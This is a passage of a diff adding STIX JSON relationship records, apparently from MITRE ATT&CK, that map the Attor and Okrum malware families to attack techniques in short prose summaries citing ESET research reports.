+ "relationship_type": "uses",
+ "id": "relationship--f0a78f8e-9d04-40d7-b0ce-6a463af4b8e1",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.463Z",
+ "created": "2020-05-06T21:01:23.463Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7f7bf7a4-4f3a-48a6-bc19-4a139ba165a0",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.467Z",
+ "created": "2020-05-06T21:01:23.467Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5e7233b-6419-4c09-b95b-c43f3004f246",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.470Z",
+ "created": "2020-05-06T21:01:23.470Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93f46e6e-cabc-4274-b50e-63bda692d01e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.473Z",
+ "created": "2020-05-06T21:01:23.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f49a45b8-6efb-4ac5-8714-9dfd9b31edbd",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.477Z",
+ "created": "2020-05-06T21:01:23.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6d39de5f-6fbd-43e3-8da8-03a4cbe46656",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.480Z",
+ "created": "2020-05-06T21:01:23.480Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a308d350-2b2b-486a-a778-8e80f231dc68",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.483Z",
+ "created": "2020-05-06T21:01:23.483Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--87c7f912-4093-44f2-9f18-e97e649dd52e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.486Z",
+ "created": "2020-05-06T21:01:23.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a2db7220-d784-485f-bc77-046b90c02daf",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.490Z",
+ "created": "2020-05-06T21:01:23.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9ebd162-da0a-4582-ba63-6bb54e165730",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.493Z",
+ "created": "2020-05-06T21:01:23.493Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40205b23-d3d0-4d6a-a739-7ba2eb061c4f",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.620Z",
+ "created": "2020-05-06T21:01:23.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--07ab0a67-7c7b-4971-9a3e-45069f234800",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.624Z",
+ "created": "2020-05-06T21:01:23.624Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eb5510f9-e2ec-4a57-9a96-93dc3028bcea",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.629Z",
+ "created": "2020-05-06T21:01:23.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--895b238e-356f-4ad0-9a62-e6ae380dccd0",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.636Z",
+ "created": "2020-05-06T21:01:23.636Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--75a82c43-c3f2-4cec-a9cb-3407b03f27b7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.641Z",
+ "created": "2020-05-06T21:01:23.641Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--68ab9dc7-4258-439c-b011-945175476fb7",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.649Z",
+ "created": "2020-05-06T21:01:23.649Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20ac9204-3ee3-454d-9d53-d5caa9ec582e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.653Z",
+ "created": "2020-05-06T21:01:23.653Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--01a01a28-19e5-4e32-8a24-a98f2b69ced5",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.656Z",
+ "created": "2020-05-06T21:01:23.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)\u2019s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d42cdf33-c3c1-4546-9a4f-40f6f64cd524",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.663Z",
+ "created": "2020-05-06T21:01:23.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--faccd8d5-0e21-4e57-aef9-1ccf72150294",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.666Z",
+ "created": "2020-05-06T21:01:23.666Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e5cae4c-240d-495b-9eca-34bba583d894",
+ "type": "relationship",
+ "modified": "2020-05-06T21:12:31.929Z",
+ "created": "2020-05-06T21:12:31.929Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--09962c1d-38be-43f6-83bc-a63d1bebdb2d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.218Z",
+ "created": "2020-05-06T21:31:07.218Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3a040d38-be65-49b4-a41a-3fd010f3ea9a",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.305Z",
+ "created": "2020-05-06T21:31:07.305Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--abf2a4b0-d0d7-4f13-9b7c-647abc3694e2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.309Z",
+ "created": "2020-05-06T21:31:07.309Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--140dda5e-b3d5-47ce-aac5-22060d5bddf2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.316Z",
+ "created": "2020-05-06T21:31:07.315Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fcd3bc09-f88b-43d7-989d-10f7058e655e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.327Z",
+ "created": "2020-05-06T21:31:07.327Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7898362c-a930-4cd4-9c94-019a253af141",
+ "type": "relationship",
+ "modified": "2020-05-06T21:31:07.334Z",
+ "created": "2020-05-06T21:31:07.334Z"
+ },
+ {
